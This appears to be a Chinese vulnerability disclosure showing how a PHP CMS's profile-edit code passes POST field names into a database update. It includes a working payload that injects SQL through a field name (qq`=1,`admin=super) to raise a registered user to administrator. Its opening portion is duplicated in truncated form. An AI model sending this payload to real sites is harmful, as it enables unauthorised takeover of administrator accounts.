<p>问题出在 用户修改资料的地方</p><pre class="">/system/module/user/control.php</pre><pre class="">public function edit($account = '') { if(!$account or RUN_MODE == 'front') $account = $this->app->user->account; if($this->app->user->account == 'guest') $this->locate(inlink('login')); if(!empty($_POST)) { $this->user->update($account); ....... </pre><p>跟进updata</p><p>/system/module/user/model.php</p><pre class="">public function update($account) { /* If the user want to change his password. */ if($this->post->password1 != false) { $this->checkPassword(); if(dao::isError()) return false; $password = $this->createPassword($this->post->password1, $account); $this->post->set('password', $password); } $user = fixer::input('post') ->cleanInt('imobile, qq, zipcode') ->setDefault('admin', 'no') ->remove('ip, account, join, visits') ->removeIF(RUN_MODE != 'admin', 'admin') ->get(); return $this->dao->update(TABLE_USER)...
<p>问题出在 用户修改资料的地方</p><pre class="">/system/module/user/control.php</pre><pre class="">public function edit($account = '') { if(!$account or RUN_MODE == 'front') $account = $this->app->user->account; if($this->app->user->account == 'guest') $this->locate(inlink('login')); if(!empty($_POST)) { $this->user->update($account); ....... </pre><p>跟进updata</p><p>/system/module/user/model.php</p><pre class="">public function update($account) { /* If the user want to change his password. */ if($this->post->password1 != false) { $this->checkPassword(); if(dao::isError()) return false; $password = $this->createPassword($this->post->password1, $account); $this->post->set('password', $password); } $user = fixer::input('post') ->cleanInt('imobile, qq, zipcode') ->setDefault('admin', 'no') ->remove('ip, account, join, visits') ->removeIF(RUN_MODE != 'admin', 'admin') ->get(); return $this->dao->update(TABLE_USER) ->data($user, $skip = 'password1,password2') ->autoCheck() ->batchCheck($this->config->user->require->edit, 'notempty') ->check('email', 'email') ->check('email', 'unique', "account!='$account'") ->checkIF($this->post->gtalk != false, 'gtalk', 'email') ->where('account')->eq($account) ->exec(); } </pre><p>fixer这个类的代码有点长就不贴了,看上面的代码也能大概看得懂它的作用。。</p><p>普通用户和管理员是在一个表的,的区别就是 admin字段。</p><p>总之对我们post的数据做了 foreach然后带入了 updata</p><p>当然他 有remove admin的,可是这太好绕过了。</p><p>直接看利用吧~</p><p>注册用户后 来到 </p><p><a href="http://localhost/user-edit.html" rel="nofollow">http://localhost/user-edit.html</a>修改资料</p><p>改包</p> post如下数据 ``` realname=aaaaaa&email=a%40qqqq.com&password1=&password2=&company=&address=&zipcode=&mobile=&phone=&qq`%3D1,`admin=super>alk= ``` <p>即可提升成为管理员。</p><p>可以看mysql的日志</p><p><img alt="1.jpg" src="https://images.seebug.org/contribute/ae677b1d-fda0-429b-b601-7b54ee36609f-1.jpg" data-image-size="1220,53"><br></p>
